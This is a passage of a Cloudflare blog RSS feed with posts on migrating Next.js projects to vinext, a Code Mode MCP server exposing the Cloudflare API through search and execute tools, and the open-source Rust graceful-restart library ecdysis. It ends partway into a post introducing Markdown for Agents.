    <p>vinext includes an <a href="https://agentskills.io"><u>Agent Skill</u></a> that handles migration for you. It works with Claude Code, OpenCode, Cursor, Codex, and dozens of other AI coding tools. Install it, open your Next.js project, and tell the AI to migrate:</p>
            <pre><code>npx skills add cloudflare/vinext</code></pre>
            <p>Then open your Next.js project in any supported tool and say:</p>
            <pre><code>migrate this project to vinext</code></pre>
            <p>The skill handles compatibility checking, dependency installation, config generation, and dev server startup. It knows what vinext supports and will flag anything that needs manual attention.</p><p>Or if you prefer doing it by hand:</p>
            <pre><code>npx vinext init    # Migrate an existing Next.js project
npx vinext dev     # Start the dev server
npx vinext deploy  # Ship to Cloudflare Workers</code></pre>
            <p>The source is at <a href="https://github.com/cloudflare/vinext"><u>github.com/cloudflare/vinext</u></a>. Issues, PRs, and feedback are welcome.</p> ]]></content:encoded>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Open Source]]></category>
            <category><![CDATA[Performance]]></category>
            <guid isPermaLink="false">2w61xT0J7H7ECzhiABytS</guid>
            <dc:creator>Steve Faulkner</dc:creator>
        </item>
        <item>
            <title><![CDATA[Code Mode: give agents an entire API in 1,000 tokens]]></title>
            <link>https://blog.cloudflare.com/code-mode-mcp/</link>
            <pubDate>Fri, 20 Feb 2026 14:00:00 GMT</pubDate>
            <description><![CDATA[ The Cloudflare API has over 2,500 endpoints. Exposing each one as an MCP tool would consume over 2 million tokens. With Code Mode, we collapsed all of it into two tools and roughly 1,000 tokens of context. ]]></description>
            <content:encoded><![CDATA[ <p><a href="https://www.cloudflare.com/learning/ai/what-is-model-context-protocol-mcp/"><u>Model Context Protocol (MCP)</u></a> has become the standard way for AI agents to use external tools. But there is a tension at its core: agents need many tools to do useful work, yet every tool added fills the model's context window, leaving less room for the actual task. </p><p><a href="https://blog.cloudflare.com/code-mode/"><u>Code Mode</u></a> is a technique we first introduced for reducing context window usage during agent tool use. Instead of describing every operation as a separate tool, let the model write code against a typed SDK and execute the code safely in a <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/worker-loader/"><u>Dynamic Worker Loader</u></a>. The code acts as a compact plan. The model can explore tool operations, compose multiple calls, and return just the data it needs. Anthropic independently explored the same pattern in their <a href="https://www.anthropic.com/engineering/code-execution-with-mcp"><u>Code Execution with MCP</u></a> post.</p><p>Today we are introducing <a href="https://github.com/cloudflare/mcp"><u>a new MCP server</u></a> for the <a href="https://developers.cloudflare.com/api/"><u>entire Cloudflare API</u></a> — from <a href="https://developers.cloudflare.com/dns/"><u>DNS</u></a> and <a href="https://developers.cloudflare.com/cloudflare-one/"><u>Zero Trust</u></a> to <a href="https://workers.cloudflare.com/product/workers/"><u>Workers</u></a> and <a href="https://workers.cloudflare.com/product/r2/"><u>R2</u></a> — that uses Code Mode. With just two tools, search() and execute(), the server is able to provide access to the entire Cloudflare API over MCP, while consuming only around 1,000 tokens. The footprint stays fixed, no matter how many API endpoints exist.</p><p>For a large API like the Cloudflare API, Code Mode reduces the number of input tokens used by 99.9%. An equivalent MCP server without Code Mode would consume 1.17 million tokens — more than the entire context window of the most advanced foundation models.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7KqjQiI09KubtUSe9Dgf0N/6f37896084c7f34abca7dc36ab18d8e0/image2.png" />
          </figure><p><sup><i>Code mode savings vs native MCP, measured with </i></sup><a href="https://github.com/openai/tiktoken"><sup><i><u>tiktoken</u></i></sup></a><sup></sup></p><p>You can start using this new Cloudflare MCP server today. And we are also open-sourcing a new <a href="https://github.com/cloudflare/agents/tree/main/packages/codemode"><u>Code Mode SDK</u></a> in the <a href="https://github.com/cloudflare/agents"><u>Cloudflare Agents SDK</u></a>, so you can use the same approach in your own MCP servers and AI Agents.</p>
    <div>
      <h3>Server‑side Code Mode</h3>
      <a href="#server-side-code-mode">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ir1KOZHIjVNyqdC9FSuZs/334456a711fb2b5fa612b3fc0b4adc48/images_BLOG-3184_2.png" />
          </figure><p>This new MCP server applies Code Mode server-side. Instead of thousands of tools, the server exports just two: <code>search()</code> and <code>execute()</code>. Both are powered by Code Mode. Here is the full tool surface area that gets loaded into the model context:</p>
            <pre><code>[
  {
    "name": "search",
    "description": "Search the Cloudflare OpenAPI spec. All $refs are pre-resolved inline.",
    "inputSchema": {
      "type": "object",
      "properties": {
        "code": {
          "type": "string",
          "description": "JavaScript async arrow function to search the OpenAPI spec"
        }
      },
      "required": ["code"]
    }
  },
  {
    "name": "execute",
    "description": "Execute JavaScript code against the Cloudflare API.",
    "inputSchema": {
      "type": "object",
      "properties": {
        "code": {
          "type": "string",
          "description": "JavaScript async arrow function to execute"
        }
      },
      "required": ["code"]
    }
  }
]
</code></pre>
            <p>To discover what it can do, the agent calls <code>search()</code>. It writes JavaScript against a typed representation of the OpenAPI spec. The agent can filter endpoints by product, path, tags, or any other metadata and narrow thousands of endpoints to the handful it needs. The full OpenAPI spec never enters the model context. The agent only interacts with it through code.</p><p>When the agent is ready to act, it calls <code>execute()</code>. The agent writes code that can make Cloudflare API requests, handle pagination, check responses, and chain operations together in a single execution. </p><p>Both tools run the generated code inside a <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/worker-loader/"><u>Dynamic Worker</u></a> isolate — a lightweight V8 sandbox with no file system, no environment variables to leak through prompt injection and external fetches disabled by default. Outbound requests can be explicitly controlled with outbound fetch handlers when needed.</p>
    <div>
      <h4>Example: Protecting an origin from DDoS attacks</h4>
      <a href="#example-protecting-an-origin-from-ddos-attacks">
        
      </a>
    </div>
    <p>Suppose a user tells their agent: "protect my origin from DDoS attacks." The agent's first step is to consult documentation. It might call the <a href="https://developers.cloudflare.com/agents/model-context-protocol/mcp-servers-for-cloudflare/"><u>Cloudflare Docs MCP Server</u></a>, use a <a href="https://github.com/cloudflare/skills"><u>Cloudflare Skill</u></a>, or search the web directly. From the docs it learns: put <a href="https://www.cloudflare.com/application-services/products/waf/"><u>Cloudflare WAF</u></a> and <a href="https://www.cloudflare.com/ddos/"><u>DDoS protection</u></a> rules in front of the origin.</p><p><b>Step 1: Search for the right endpoints
</b>The <code>search</code> tool gives the model a <code>spec</code> object: the full Cloudflare OpenAPI spec with all <code>$refs</code> pre-resolved. The model writes JavaScript against it. Here the agent looks for WAF and ruleset endpoints on a zone:</p>
            <pre><code>async () =&gt; {
  const results = [];
  for (const [path, methods] of Object.entries(spec.paths)) {
    if (path.includes('/zones/') &amp;&amp;
        (path.includes('firewall/waf') || path.includes('rulesets'))) {
      for (const [method, op] of Object.entries(methods)) {
        results.push({ method: method.toUpperCase(), path, summary: op.summary });
      }
    }
  }
  return results;
}
</code></pre>
            <p>The server runs this code in a Workers isolate and returns:</p>
            <pre><code>[
  { "method": "GET",    "path": "/zones/{zone_id}/firewall/waf/packages",              "summary": "List WAF packages" },
  { "method": "PATCH",  "path": "/zones/{zone_id}/firewall/waf/packages/{package_id}", "summary": "Update a WAF package" },
  { "method": "GET",    "path": "/zones/{zone_id}/firewall/waf/packages/{package_id}/rules", "summary": "List WAF rules" },
  { "method": "PATCH",  "path": "/zones/{zone_id}/firewall/waf/packages/{package_id}/rules/{rule_id}", "summary": "Update a WAF rule" },
  { "method": "GET",    "path": "/zones/{zone_id}/rulesets",                           "summary": "List zone rulesets" },
  { "method": "POST",   "path": "/zones/{zone_id}/rulesets",                           "summary": "Create a zone ruleset" },
  { "method": "GET",    "path": "/zones/{zone_id}/rulesets/phases/{ruleset_phase}/entrypoint", "summary": "Get a zone entry point ruleset" },
  { "method": "PUT",    "path": "/zones/{zone_id}/rulesets/phases/{ruleset_phase}/entrypoint", "summary": "Update a zone entry point ruleset" },
  { "method": "POST",   "path": "/zones/{zone_id}/rulesets/{ruleset_id}/rules",        "summary": "Create a zone ruleset rule" },
  { "method": "PATCH",  "path": "/zones/{zone_id}/rulesets/{ruleset_id}/rules/{rule_id}", "summary": "Update a zone ruleset rule" }
]
</code></pre>
            <p>The full Cloudflare API spec has over 2,500 endpoints. The model narrowed that to the WAF and ruleset endpoints it needs, without any of the spec entering the context window. </p><p>The model can also drill into a specific endpoint's schema before calling it. Here it inspects what phases are available on zone rulesets:</p>
            <pre><code>async () =&gt; {
  const op = spec.paths['/zones/{zone_id}/rulesets']?.get;
  const items = op?.responses?.['200']?.content?.['application/json']?.schema;
  // Walk the schema to find the phase enum
  const props = items?.allOf?.[1]?.properties?.result?.items?.allOf?.[1]?.properties;
  return { phases: props?.phase?.enum };
}

{
  "phases": [
    "ddos_l4", "ddos_l7",
    "http_request_firewall_custom", "http_request_firewall_managed",
    "http_response_firewall_managed", "http_ratelimit",
    "http_request_redirect", "http_request_transform",
    "magic_transit", "magic_transit_managed"
  ]
}
</code></pre>
            <p>The agent now knows the exact phases it needs: <code>ddos_l7 </code>for DDoS protection and <code>http_request_firewall_managed</code> for WAF.</p><p><b>Step 2: Act on the API
</b>The agent switches to using <code>execute</code>. The sandbox gets a <code>cloudflare.request()</code> client that can make authenticated calls to the Cloudflare API. First the agent checks what rulesets already exist on the zone:</p>
            <pre><code>async () =&gt; {
  const response = await cloudflare.request({
    method: "GET",
    path: `/zones/${zoneId}/rulesets`
  });
  return response.result.map(rs =&gt; ({
    name: rs.name, phase: rs.phase, kind: rs.kind
  }));
}

[
  { "name": "DDoS L7",          "phase": "ddos_l7",                        "kind": "managed" },
  { "name": "Cloudflare Managed","phase": "http_request_firewall_managed", "kind": "managed" },
  { "name": "Custom rules",     "phase": "http_request_firewall_custom",   "kind": "zone" }
]
</code></pre>
            <p>The agent sees that managed DDoS and WAF rulesets already exist. It can now chain calls to inspect their rules and update sensitivity levels in a single execution:</p>
            <pre><code>async () =&gt; {
  // Get the current DDoS L7 entrypoint ruleset
  const ddos = await cloudflare.request({
    method: "GET",
    path: `/zones/${zoneId}/rulesets/phases/ddos_l7/entrypoint`
  });

  // Get the WAF managed ruleset
  const waf = await cloudflare.request({
    method: "GET",
    path: `/zones/${zoneId}/rulesets/phases/http_request_firewall_managed/entrypoint`
  });
}
</code></pre>
            <p>This entire operation, from searching the spec and inspecting a schema to listing rulesets and fetching DDoS and WAF configurations, took four tool calls.</p>
    <div>
      <h3>The Cloudflare MCP server</h3>
      <a href="#the-cloudflare-mcp-server">
        
      </a>
    </div>
    <p>We started with MCP servers for individual products. Want an agent that manages DNS? Add the <a href="https://github.com/cloudflare/mcp-server-cloudflare/tree/main/apps/dns-analytics"><u>DNS MCP server</u></a>. Want Workers logs? Add the <a href="https://developers.cloudflare.com/agents/model-context-protocol/mcp-servers-for-cloudflare/"><u>Workers Observability MCP server</u></a>. Each server exported a fixed set of tools that mapped to API operations. This worked when the tool set was small, but the Cloudflare API has over 2,500 endpoints. No collection of hand-maintained servers could keep up.</p><p>The Cloudflare MCP server simplifies this. Two tools, roughly 1,000 tokens, and coverage of every endpoint in the API. When we add new products, the same <code>search()</code> and <code>execute()</code> code paths discover and call them — no new tool definitions, no new MCP servers. It even has support for the <a href="https://developers.cloudflare.com/analytics/graphql-api/"><u>GraphQL Analytics API</u></a>.</p><p>Our MCP server is built on the latest MCP specifications. It is OAuth 2.1 compliant, using <a href="https://github.com/cloudflare/workers-oauth-provider"><u>Workers OAuth Provider</u></a> to downscope the token to selected permissions approved by the user when connecting. The agent  only gets the capabilities the user explicitly granted. </p><p>For developers, this means you can use a simple agent loop and still give your agent access to the full Cloudflare API with built-in progressive capability discovery.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/60ZoSFdK6t6hR6DpAn6Bub/93b86239cedb06d7fb265859be7590e8/images_BLOG-3184_4.png" />
          </figure>
    <div>
      <h3>Comparing approaches to context reduction</h3>
      <a href="#comparing-approaches-to-context-reduction">
        
      </a>
    </div>
    <p>Several approaches have emerged to reduce how many tokens MCP tools consume:</p><p><b>Client-side Code Mode</b> was our first experiment. The model writes TypeScript against typed SDKs and runs it in a Dynamic Worker Loader on the client. The tradeoff is that it requires the agent to ship with secure sandbox access. Code Mode is implemented in <a href="https://block.github.io/goose/blog/2025/12/15/code-mode-mcp/"><u>Goose</u></a> and Anthropics Claude SDK as <a href="https://platform.claude.com/docs/en/agents-and-tools/tool-use/programmatic-tool-calling"><u>Programmatic Tool Calling</u></a>.</p><p><b>Command-line interfaces </b>are another path. CLIs are self-documenting and reveal capabilities as the agent explores. Tools like <a href="https://openclaw.ai/"><u>OpenClaw</u></a> and <a href="https://blog.cloudflare.com/moltworker-self-hosted-ai-agent/"><u>Moltworker</u></a> convert MCP servers into CLIs using <a href="https://github.com/steipete/mcporter"><u>MCPorter</u></a> to give agents progressive disclosure. The limitation is obvious: the agent needs a shell, which not every environment provides and which introduces a much broader attack surface than a sandboxed isolate.</p><p><b>Dynamic tool search</b>, as used by <a href="https://x.com/trq212/status/2011523109871108570"><u>Anthropic in Claude Code</u></a>, surfaces a smaller set of tools hopefully relevant to the current task. It shrinks context use but now requires a search function that must be maintained and evaluated, and each matched tool still uses tokens.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5FPxVAuJggv7A08DbPsksb/aacb9087a79d08a1430ea87bb6960ad3/images_BLOG-3184_5.png" />
          </figure><p>Each approach solves a real problem. But for MCP servers specifically, server-side Code Mode combines their strengths: fixed token cost regardless of API size, no modifications needed on the agent side, progressive discovery built in, and safe execution inside a sandboxed isolate. The agent just calls two tools with code. Everything else happens on the server.</p>
    <div>
      <h3>Get started today</h3>
      <a href="#get-started-today">
        
      </a>
    </div>
    <p>The Cloudflare MCP server is available now. Point your MCP client at the server URL and you'll be redirected to Cloudflare to authorize and select the permissions to grant to your agent. Add this config to your MCP client: </p>
            <pre><code>{
  "mcpServers": {
    "cloudflare-api": {
      "url": "https://mcp.cloudflare.com/mcp"
    }
  }
}
</code></pre>
            <p>For CI/CD, automation, or if you prefer managing tokens yourself, create a Cloudflare API token with the permissions you need. Both user tokens and account tokens are supported and can be passed as bearer tokens in the <code>Authorization</code> header.</p><p>More information on different MCP setup configurations can be found at the <a href="https://github.com/cloudflare/mcp"><u>Cloudflare MCP repository</u></a>.</p>
    <div>
      <h3>Looking forward</h3>
      <a href="#looking-forward">
        
      </a>
    </div>
    <p>Code Mode solves context costs for a single API. But agents rarely talk to one service. A developer's agent might need the Cloudflare API alongside GitHub, a database, and an internal docs server. Each additional MCP server brings the same context window pressure we started with.</p><p><a href="https://blog.cloudflare.com/zero-trust-mcp-server-portals/"><u>Cloudflare MCP Server Portals</u></a> let you compose multiple MCP servers behind a single gateway with unified auth and access control. We are building a first-class Code Mode integration for all your MCP servers, and exposing them to agents with built-in progressive discovery and the same fixed-token footprint, regardless of how many services sit behind the gateway.</p> ]]></content:encoded>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Optimization]]></category>
            <category><![CDATA[Open Source]]></category>
            <guid isPermaLink="false">2lWwgP33VT0NJjZ3pWShsw</guid>
            <dc:creator>Matt Carey</dc:creator>
        </item>
        <item>
            <title><![CDATA[Shedding old code with ecdysis: graceful restarts for Rust services at Cloudflare]]></title>
            <link>https://blog.cloudflare.com/ecdysis-rust-graceful-restarts/</link>
            <pubDate>Fri, 13 Feb 2026 14:00:00 GMT</pubDate>
            <description><![CDATA[ ecdysis is a Rust library enabling zero-downtime upgrades for network services. After five years protecting millions of connections at Cloudflare, it’s now open source. ]]></description>
            <content:encoded><![CDATA[ <blockquote><p>ecdysis | <i>ˈekdəsəs</i> |</p><p>noun</p><p>    the process of shedding the old skin (in reptiles) or casting off the outer 
    cuticle (in insects and other arthropods).  </p></blockquote><p>How do you upgrade a network service, handling millions of requests per second around the globe, without disrupting even a single connection?</p><p>One of our solutions at Cloudflare to this massive challenge has long been <a href="https://github.com/cloudflare/ecdysis"><b><u>ecdysis</u></b></a>, a Rust library that implements graceful process restarts where no live connections are dropped, and no new connections are refused. </p><p>Last month, <b>we open-sourced ecdysis</b>, so now anyone can use it. After five years of production use at Cloudflare, ecdysis has proven itself by enabling zero-downtime upgrades across our critical Rust infrastructure, saving millions of requests with every restart across Cloudflare’s <a href="https://www.cloudflare.com/network/"><u>global network</u></a>.</p><p>It’s hard to overstate the importance of getting these upgrades right, especially at the scale of Cloudflare’s network. Many of our services perform critical tasks such as traffic routing, <a href="https://www.cloudflare.com/application-services/solutions/certificate-lifecycle-management/"><u>TLS lifecycle management</u></a>, or firewall rules enforcement, and must operate continuously. If one of these services goes down, even for an instant, the cascading impact can be catastrophic. Dropped connections and failed requests quickly lead to degraded customer performance and business impact.</p><p>When these services need updates, security patches can’t wait. Bug fixes need deployment and new features must roll out. </p><p>The naive approach involves waiting for the old process to be stopped before spinning up the new one, but this creates a window of time where connections are refused and requests are dropped. For a service handling thousands of requests per second in a single location, multiply that across hundreds of data centers, and a brief restart becomes millions of failed requests globally.</p><p>Let’s dig into the problem, and how ecdysis has been the solution for us — and maybe will be for you. </p><p><b>Links</b>: <a href="https://github.com/cloudflare/ecdysis">GitHub</a> <b>|</b> <a href="https://crates.io/crates/ecdysis">crates.io</a> <b>|</b> <a href="https://docs.rs/ecdysis">docs.rs</a></p>
    <div>
      <h3>Why graceful restarts are hard</h3>
      <a href="#why-graceful-restarts-are-hard">
        
      </a>
    </div>
    <p>The naive approach to restarting a service, as we mentioned, is to stop the old process and start a new one. This works acceptably for simple services that don’t handle real-time requests, but for network services processing live connections, this approach has critical limitations.</p><p>First, the naive approach creates a window during which no process is listening for incoming connections. When the old process stops, it closes its listening sockets, which causes the OS to immediately refuse new connections with <code>ECONNREFUSED</code>. Even if the new process starts immediately, there will always be a gap where nothing is accepting connections, whether milliseconds or seconds. For a service handling thousands of requests per second, even a gap of 100ms means hundreds of dropped connections.</p><p>Second, stopping the old process kills all already-established connections. A client uploading a large file or streaming video gets abruptly disconnected. Long-lived connections like WebSockets or gRPC streams are terminated mid-operation. From the client’s perspective, the service simply vanishes.</p><p>Binding the new process before shutting down the old one appears to solve this, but also introduces additional issues. The kernel normally allows only one process to bind to an address:port combination, but <a href="https://man7.org/linux/man-pages/man7/socket.7.html"><u>the SO_REUSEPORT socket option</u></a> permits multiple binds. However, this creates a problem during process transitions that makes it unsuitable for graceful restarts.</p><p>When <code>SO_REUSEPORT</code> is used, the kernel creates separate listening sockets for each process and <a href="https://lwn.net/Articles/542629/"><u>load balances new connections across these sockets</u></a>. When the initial <code>SYN</code> packet for a connection is received, the kernel will assign it to one of the listening processes. Once the initial handshake is completed, the connection then sits in the <code>accept()</code> queue of the process until the process accepts it. If the process then exits before accepting this connection, it becomes orphaned and is terminated by the kernel. GitHub’s engineering team documented this issue extensively when <a href="https://github.blog/2020-10-07-glb-director-zero-downtime-load-balancer-updates/"><u>building their GLB Director load balancer</u></a>.</p>
    <div>
      <h3>How ecdysis works</h3>
      <a href="#how-ecdysis-works">
        
      </a>
    </div>
    <p>When we set out to design and build ecdysis, we identified four key goals for the library:</p><ol><li><p><b>Old code can be completely shut down</b> post-upgrade.</p></li><li><p><b>The new process has a grace period</b> for initialization.</p></li><li><p><b>New code crashing during initialization is acceptable</b> and shouldn’t affect the running service.</p></li><li><p><b>Only a single upgrade runs in parallel</b> to avoid cascading failures.</p></li></ol><p>ecdysis satisfies these requirements following an approach pioneered by NGINX, which has supported graceful upgrades since its early days. The approach is straightforward: </p><ol><li><p>The parent process <code>fork()</code>s a new child process.</p></li><li><p>The child process replaces itself with a new version of the code with <code>execve()</code>.</p></li><li><p>The child process inherits the socket file descriptors via a named pipe shared with the parent.</p></li><li><p>The parent process waits for the child process to signal readiness before shutting down.</p></li></ol>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4QK8GY1s30C8RUovBQnqbD/525094478911eda96c7877a10753159f/image3.png" />
          </figure><p>Crucially, the socket remains open throughout the transition. The child process inherits the listening socket from the parent as a file descriptor shared via a named pipe. During the child's initialization, both processes share the same underlying kernel data structure, allowing the parent to continue accepting and processing new and existing connections. Once the child completes initialization, it notifies the parent and begins accepting connections. Upon receiving this ready notification, the parent immediately closes its copy of the listening socket and continues handling only existing connections. </p><p>This process eliminates coverage gaps while providing the child a safe initialization window. There is a brief window of time when both the parent and child may accept connections concurrently. This is intentional; any connections accepted by the parent are simply handled until completion as part of the draining process.</p><p>This model also provides the required crash safety. If the child process fails during initialization (e.g., due to a configuration error), it simply exits. Since the parent never stopped listening, no connections are dropped, and the upgrade can be retried once the problem is fixed.</p><p>ecdysis implements the forking model with first-class support for asynchronous programming through<a href="https://tokio.rs"> <u>Tokio</u></a> and s<code>ystemd</code> integration:</p><ul><li><p><b>Tokio integration</b>: Native async stream wrappers for Tokio. Inherited sockets become listeners without additional glue code. For synchronous services, ecdysis supports operation without async runtime requirements.</p></li><li><p><b>systemd-notify support</b>: When the <code>systemd_notify</code> feature is enabled, ecdysis automatically integrates with systemd’s process lifecycle notifications. Setting <code>Type=notify-reload</code> in your service unit file allows systemd to track upgrades correctly.</p></li><li><p><b>systemd named sockets</b>: The <code>systemd_sockets</code> feature enables ecdysis to manage systemd-activated sockets. Your service can be socket-activated and support graceful restarts simultaneously.</p></li></ul><p>Platform note: ecdysis relies on Unix-specific syscalls for socket inheritance and process management. It does not work on Windows. This is a fundamental limitation of the forking approach.</p>
    <div>
      <h3>Security considerations</h3>
      <a href="#security-considerations">
        
      </a>
    </div>
    <p>Graceful restarts introduce security considerations. The forking model creates a brief window where two process generations coexist, both with access to the same listening sockets and potentially sensitive file descriptors.</p><p>ecdysis addresses these concerns through its design:</p><p><b>Fork-then-exec</b>: ecdysis follows the traditional Unix pattern of <code>fork()</code> followed immediately by <code>execve()</code>. This ensures the child process starts with a clean slate: new address space, fresh code, and no inherited memory. Only explicitly-passed file descriptors cross the boundary.</p><p><b>Explicit inheritance</b>: Only listening sockets and communication pipes are inherited. Other file descriptors are closed via <code>CLOEXEC</code> flags. This prevents accidental leakage of sensitive handles.</p><p><b>seccomp compatibility</b>: Services using seccomp filters must allow <code>fork()</code> and <code>execve()</code>. This is a tradeoff: graceful restarts require these syscalls, so they cannot be blocked.</p><p>For most network services, these tradeoffs are acceptable. The security of the fork-exec model is well understood and has been battle-tested for decades in software like NGINX and Apache.</p>
    <div>
      <h3>Code example</h3>
      <a href="#code-example">
        
      </a>
    </div>
    <p>Let’s look at a practical example. Here’s a simplified TCP echo server that supports graceful restarts:</p>
            <pre><code>use ecdysis::tokio_ecdysis::{SignalKind, StopOnShutdown, TokioEcdysisBuilder};
use tokio::{net::TcpStream, task::JoinSet};
use futures::StreamExt;
use std::net::SocketAddr;

#[tokio::main]
async fn main() {
    // Create the ecdysis builder
    let mut ecdysis_builder = TokioEcdysisBuilder::new(
        SignalKind::hangup()  // Trigger upgrade/reload on SIGHUP
    ).unwrap();

    // Trigger stop on SIGUSR1
    ecdysis_builder
        .stop_on_signal(SignalKind::user_defined1())
        .unwrap();

    // Create listening socket - will be inherited by children
    let addr: SocketAddr = "0.0.0.0:8080".parse().unwrap();
    let stream = ecdysis_builder
        .build_listen_tcp(StopOnShutdown::Yes, addr, |builder, addr| {
            builder.set_reuse_address(true)?;
            builder.bind(&amp;addr.into())?;
            builder.listen(128)?;
            Ok(builder.into())
        })
        .unwrap();

    // Spawn task to handle connections
    let server_handle = tokio::spawn(async move {
        let mut stream = stream;
        let mut set = JoinSet::new();
        while let Some(Ok(socket)) = stream.next().await {
            set.spawn(handle_connection(socket));
        }
        set.join_all().await;
    });

    // Signal readiness and wait for shutdown
    let (_ecdysis, shutdown_fut) = ecdysis_builder.ready().unwrap();
    let shutdown_reason = shutdown_fut.await;

    log::info!("Shutting down: {:?}", shutdown_reason);

    // Gracefully drain connections
    server_handle.await.unwrap();
}

async fn handle_connection(mut socket: TcpStream) {
    // Echo connection logic here
}</code></pre>
            <p>The key points:</p><ol><li><p><code><b>build_listen_tcp</b></code> creates a listener that will be inherited by child processes.</p></li><li><p><code><b>ready()</b></code> signals to the parent process that initialization is complete and that it can safely exit.</p></li><li><p><code><b>shutdown_fut.await</b></code> blocks until an upgrade or stop is requested. This future only yields once the process should be shut down, either because an upgrade/reload was executed successfully or because a shutdown signal was received.</p></li></ol><p>When you send <code>SIGHUP</code> to this process, here’s what ecdysis does…</p><p><i>…on the parent process:</i></p><ul><li><p>Forks and execs a new instance of your binary.</p></li><li><p>Passes the listening socket to the child.</p></li><li><p>Waits for the child to call <code>ready()</code>.</p></li><li><p>Drains existing connections, then exits.</p></li></ul><p><i>…on the child process:</i></p><ul><li><p>Initializes itself following the same execution flow as the parent, except any sockets owned by ecdysis are inherited and not bound by the child.</p></li><li><p>Signals readiness to the parent by calling <code>ready()</code>.</p></li><li><p>Blocks waiting for a shutdown or upgrade signal.</p></li></ul>
    <div>
      <h3>Production at scale</h3>
      <a href="#production-at-scale">
        
      </a>
    </div>
    <p>ecdysis has been running in production at Cloudflare since 2021. It powers critical Rust infrastructure services deployed across 330+ data centers in 120+ countries. These services handle billions of requests per day and require frequent updates for security patches, feature releases, and configuration changes.</p><p>Every restart using ecdysis saves hundreds of thousands of requests that would otherwise be dropped during a naive stop/start cycle. Across our global footprint, this translates to millions of preserved connections and improved reliability for customers.</p>
    <div>
      <h3>ecdysis vs alternatives</h3>
      <a href="#ecdysis-vs-alternatives">
        
      </a>
    </div>
    <p>Graceful restart libraries exist for several ecosystems. Understanding when to use ecdysis versus alternatives is critical to choosing the right tool.</p><p><a href="https://github.com/cloudflare/tableflip"><b><u>tableflip</u></b></a> is our Go library that inspired ecdysis. It implements the same fork-and-inherit model for Go services. If you need Go, tableflip is a great option!</p><p><a href="https://github.com/cloudflare/shellflip"><b><u>shellflip</u></b></a> is Cloudflare’s other Rust graceful restart library, designed specifically for Oxy, our Rust-based proxy. shellflip is more opinionated: it assumes systemd and Tokio, and focuses on transferring arbitrary application state between parent and child. This makes it excellent for complex stateful services, or services that want to apply such aggressive sandboxing that they can’t even open their own sockets, but adds overhead for simpler cases.</p>
    <div>
      <h3>Start building</h3>
      <a href="#start-building">
        
      </a>
    </div>
    <p>ecdysis brings five years of production-hardened graceful restart capabilities to the Rust ecosystem. It’s the same technology protecting millions of connections across Cloudflare’s global network, now open-sourced and available for anyone!</p><p>Full documentation is available at <a href="https://docs.rs/ecdysis"><u>docs.rs/ecdysis</u></a>, including API reference, examples for common use cases, and steps for integrating with <code>systemd</code>.</p><p>The <a href="https://github.com/cloudflare/ecdysis/tree/main/examples"><u>examples directory</u></a> in the repository contains working code demonstrating TCP listeners, Unix socket listeners, and systemd integration.</p><p>The library is actively maintained by the Argo Smart Routing &amp; Orpheus team, with contributions from teams across Cloudflare. We welcome contributions, bug reports, and feature requests on <a href="https://github.com/cloudflare/ecdysis"><u>GitHub</u></a>.</p><p>Whether you’re building a high-performance proxy, a long-lived API server, or any network service where uptime matters, ecdysis can provide a foundation for zero-downtime operations.</p><p>Start building:<a href="https://github.com/cloudflare/ecdysis"> <u>github.com/cloudflare/ecdysis</u></a></p> ]]></content:encoded>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[Open Source]]></category>
            <category><![CDATA[Infrastructure]]></category>
            <category><![CDATA[Engineering]]></category>
            <category><![CDATA[Edge]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Rust]]></category>
            <guid isPermaLink="false">GMarF75NkFuiwVuyFJk77</guid>
            <dc:creator>Manuel Olguín Muñoz</dc:creator>
        </item>
        <item>
            <title><![CDATA[Introducing Markdown for Agents]]></title>
            <link>https://blog.cloudflare.com/markdown-for-agents/</link>
            <pubDate>Thu, 12 Feb 2026 14:03:00 GMT</pubDate>
            <description><![CDATA[ The way content is discovered online is shifting, from traditional search engines to AI agents that need structured data from a Web built for humans. It’s time to consider not just human visitors, but start to treat agents as first-class citizens. Markdown for Agents automatically converts any HTML page requested from our network to markdown. ]]></description>
            <content:encoded><![CDATA[ <p>The way content and businesses are discovered online is changing rapidly. In the past, traffic originated from traditional search engines, and SEO determined who got found first. Now the traffic is increasingly coming from AI crawlers and agents that demand structured data within the often-unstructured Web that was built for humans.</p><p>As a business, to continue to stay ahead, now is the time to consider not just human visitors, or traditional wisdom for SEO-optimization, but start to treat agents as first-class citizens. </p>
    <div>
      <h2>Why markdown is important</h2>
      <a href="#why-markdown-is-important">
        
      </a>
    </div>
    <p>Feeding raw HTML to an AI is like paying by the word to read packaging instead of the letter inside. A simple <code>## About Us</code> on a page in markdown costs roughly 3 tokens; its HTML equivalent – <code>&lt;h2 class="section-title" id="about"&gt;About Us&lt;/h2&gt;</code> – burns 12-15, and that's before you account for the <code>&lt;div&gt;</code> wrappers, nav bars, and script tags that pad every real web page and have zero semantic value.</p><p>This blog post you’re reading takes 16,180 tokens in HTML and 3,150 tokens when converted to markdown. <b>That’s a 80% reduction in token usage</b>.</p><p><a href="https://en.wikipedia.org/wiki/Markdown"><u>Markdown</u></a> has quickly become the <i>lingua franca</i> for agents and AI systems as a whole. The format’s explicit structure makes it ideal for AI processing, ultimately resulting in better results while minimizing token waste.</p><p>The problem is that the Web is made of HTML, not markdown, and page weight has been <a href="https://almanac.httparchive.org/en/2025/page-weight#page-weight-over-time"><u>steadily increasing</u></a> over the years, making pages hard to parse. For agents, their goal is to filter out all non-essential elements and scan the relevant content.</p><p>The conversion of HTML to markdown is now a common step for any AI pipeline. Still, this process is far from 